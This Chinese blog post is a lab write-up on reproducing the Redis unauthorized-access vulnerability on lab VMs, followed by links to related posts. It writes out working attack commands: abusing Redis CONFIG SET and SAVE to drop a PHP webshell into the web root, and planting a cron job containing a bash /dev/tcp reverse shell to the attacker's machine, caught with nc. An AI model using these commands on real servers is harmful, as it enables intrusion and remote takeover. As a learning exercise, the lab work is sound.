Redis未授权漏洞环境搭建复现问题解决

最新推荐文章于 2024-05-15 11:09:48 发布
最新推荐文章于 2024-05-15 11:09:48 发布
阅读量654 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: redis linux web安全 安全漏洞
如需转载请于主页联系,得到允许方可实施
本文链接:https://blog.csdn.net/m0_60988110/article/details/123544633
版权

一:搭建环境卸载重装几次,翻看几十篇文章最后复现成功,因此记录一下

环境VMware,两台主机使用NAT模式连接

Kali192.168.209.129
CentOS7192.168.209.128

二:CentOS搭建redis,以root权限开启虚机

(1).下载安装包

wget http://download.redis.io/releases/redis-4.0.6.tar.gz

解压

tar -zxvf redis-4.0.6.tar.gz

(2).redis 是用 C 语言开发,安装之前必先安装 gcc 环境

yum install -y gcc

(3).切换到redis下载目录,执行编译

cd /usr/local/redis-4.0.6/ 目录看自己解压位置
make 编译redis

(4).复制redis配置文件到etc文件夹下面

cp /usr/local/redis-4.0.6/redis.conf /etc

(5).切换目录到etc,编辑redis.conf文件

vi redis.conf

此处,不要去除#,意思是可以允许任意ip外连

关闭保护模式
redis默认端口6379不动

(6).启动redis服务

/usr/local/redis-4.0.6/src/redis-server /etc/redis.conf
成功如下图所示:

三:Kali操作

(1).尝试连接

redis-cli -h 192.168.209.128 -p 6379 无密码连接目标主机
如果没有redis-cli,需要安装

(2).可以输入些命令看看基本信息

info查看基本信息

keys* 查看键,发现是空的

四:使用redis进行攻击,这篇文章很详细但是也有问题,下面叙述

参考链接:h ttps://blog.csdn.net/qq_41210745/article/details/103309137

(1)使用redis写webshell

config set dir /var/www/html 设置redis 的备份文件存放目录为 /var/www/html
config set dbfilename test.php 设置一个备份名为test.php的文件且放到存放目录
set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n",因为redis会自带乱七八糟的东西,如果不换行转义,phpinfo是读不出来
save 一次备份操作
redis是一个key-value型数据库,信息以键对应值的关系存储在内存。

如果按照以上的操作,上传其实是成功,在靶机可以看到,但在kali使用firefox打开会发现是无法访问到的,这让人很不舒服,盘它!

链接作者遇到此问题但没有提出解决方法

查找资料后发现靶机缺少web环境,需要安装apache

参考链接: https://blog.csdn.net/xgrx2008/article/details/82715186

1.安装httpd

yum install httpd* -y

2.启动httpd服务

systemctl start httpd.service 开启服务
systemctl status httpd.service 查看状态

3.经过这一系类操作,你会发现,wc真的可以访问成功了?当然没有,新的问题又来了,apache访问test.php没有转到页面而是直接下载php文件

4.为了解决这一问题,找到下面这篇文章,修改配置得以成功,得到了phpinfo页面,webshell执行成功

参考链接: https://www.cnblogs.com/peng-lan/p/11361758.html

(2)使用nc反弹端口成功getshell

1.set xx "\n* * * * * bash -i >& /dev/tcp/192.168.209.129/9999 0>&1\n"
bash -i意为创建一个交互式的bash shell
/dev/tcp读写这个文件就相当于在socket连接中传输数据
这条命令我的理解是利用bash 去与攻击机产生交互
2.config set dbfilename root 写入名为root的文件
3.config set dir /var/spool/cron
/var/spool/scon是linux默认的计划任务,Linux会定期去执行
save

再开一个窗口,nc监听,成功getshell

nc -lvnp 9999

五:总结

redis未授权耗时三个下午才完成,配置文件并不多难,但是安装一个全新虚拟机所欠缺的环境太多,各种奇怪的问题接踵而来,实在有些无奈。

以上命令不一定适合所有人,如有欠缺与错误之处,欢迎指正,毕竟我只是个菜鸟。

首发于2021-07-30 15:17

身高两米不到
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis简介、安装与授权访问漏洞环境部署
7Riven's blog
11-29 1175
Redis介绍 Remote Dictionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。它通常被称为数据结构服务器,因为值(value)可以是 字符串(String),...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
(白帽子学习笔记)授权访问漏洞——redis环境搭建
冬的博客
08-26 406
读者需知 1、本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 2、本文参考了一些文章,如有侵权请联系本人删除 靶机:centos7 攻击机:kali 一、centos中的redis安装 1、创建redis文件夹 2、将压缩包转存到已经提前创建好的/home/redis/对应目录下 3、解压压缩包 tar zxf redis-5.0.6.tar.gz 4、进入对应目录下,对文件进行编译 <1>首先先搭建c编译环境.
Redis动态修改配置(config set)报错问题
最新发布
2302_77302329的博客
05-15 597
如果出现 (error) ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config 报错。
Redis授权访问漏洞复现(包括环境搭建
smart的博客
10-19 5045
Redis授权访问漏洞复现(包括环境搭建Redis环境搭建一、工具二、redis安装步骤拿shell的三种姿势一、通过向Web目录中写webshell二、利用计划任务执行命令反弹shel三、写入ssh公钥,获取操作系统权限redis授权漏洞防御手段 Redis环境搭建 一、工具 工具名称 版本 redis 3.2.9 centos 6.9 Redis官网复制redis的下载连接:http://download.redis.io/releases/redis-3.2.9.tar.
redis授权访问漏洞环境搭建复现-ssh免密登录
冯的博客
01-05 3099
首先,安装redis 我是直接sudo apt-get redis 安装的 然后启动redis 直接找到/usr/bin目录下的redis-server和redis-cli 测试连接成功 因为我是腾讯云的服务器,想要本地远程访问6379端口需要具备三个条件: 1配置规则 2 配置防火墙,我这里因为只是测试一下就直接关闭了防火墙,这里使用ufw disable关闭防火墙,使用ufw status 查看是否成功 3 第三个是要去redis.conf中配置一下 这里原本是..
搭建redis授权环境,利用该漏洞getshell
Xiaolanzhende的博客
03-03 190
搭设redis授权环境,利用该漏洞获取getshell。
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
docker搭建redis授权访问漏洞环境
weixin_30617695的博客
04-04 600
这是redis授权访问漏洞环境,可以使用该环境练习重置/etc/passwd文件从而重置root密码 环境我已经搭好放在了docker hub 可以使用命令docker search ju5ton1y来搜索该镜像 构建好容器之后需进入容器对ssh服务重启 /etc/init.d/ssh restart Dockerfile如下: #Redis is not authori...
Redis授权漏洞检测方法+Redis基础+Redis环境搭建+Redis恶意利用
t小小小白的博客
08-23 2257
Redis授权漏洞检测方法+Redis基础+Redis环境搭建+Redis恶意利用作者:山丘安全攻防实验室 O8前言一、Redis命令基础二、Redis漏洞授权挖掘二、Redis环境搭建与概述1)环境概述2)环境搭建三、漏洞利用1)授权漏洞利用说明2)root权限漏洞利用1、创建ssh公匙2、创建一个O8.txt密匙3、清除Redis所有数据4、 Redis创建恶意key5、修改Redis路...
Redis授权访问漏洞复现及利用
Lilin's博客
03-20 628
Redis授权访问漏洞复现及利用Redis相关介绍应用场景常用语法漏洞复现环境搭建Centos 7 环境配置安装Apache安装PHP安装Redis漏洞利用准备kali安装Rediswindows安装Redis授权访问漏洞利用webshell反弹shell写公钥主从复制RCE预防措施其他问题 Redis相关介绍 Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。 应用场景 在Java web中主要有两个应用场景: 存储、缓存用的数据 需要高速读写的场合使用它快速读写 常
Nginx漏洞总结
热门推荐
weixin_42345596的博客
10-08 2万+
Nginx简介 Nginx (engine x) 是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。其将源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、简单的配置文件和低系统资源的消耗而闻名。2011年6月1日,nginx 1.0.4发布。 Nginx是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力在同类型的网页服务器中表现较
redis利用总结
qq_56426046的博客
09-28 1146
kali安装redis-clikali监听9999端口远程访问不了把protected-mode改成no另一种代码形式。
Redis漏洞【总结】授权访问复现与利用
qq_45300786的博客
04-20 1382
Linux】安装httpd+php 一、安装redis服务 kali:192.168.100.23 靶机(centos):192.168.100.20 靶机(centos)安装redis服务 wget http://download.redis.io/releases/redis-2.8.17.tar.gz (如果下载不下来的话:http://distfiles.macports.org/redis/) 解压安装包:tar xzf redis-2.8.17.tar.gz 进入redis目录:cd r
redis授权访问
weixin_61662156的博客
04-15 136
问题总结 1. 攻击机 kali :192.168.37.143 靶机 centos7: 192.168.37.137 2.在redis下载中遇见make无法编译问题 解决linux安装redis解决make报错)_redis make报错_入门小白.的博客-CSDN博客 3.重启redis-server报错 【Redis】Failed listening on port 6379 (TCP), aborting. ps -ef | grep redis 找到占用端口进
记录一次Redis授权getshell几种常见方法
qq_45888826的博客
09-17 3812
记录一次Redis授权getshell几种常见方法
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2751
Redis授权访问漏洞利用方式总结(含靶场搭建
redis授权个人总结-Mature1
08-03
Redis授权访问风险是一种常见的安全漏洞,许多运维人员正确配置Redis服务器的访问权限,导致攻击者可以通过授权访问来获取敏感信息或执行恶意操作。在本文中,我将总结Redis授权访问风险及其对系统安全的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值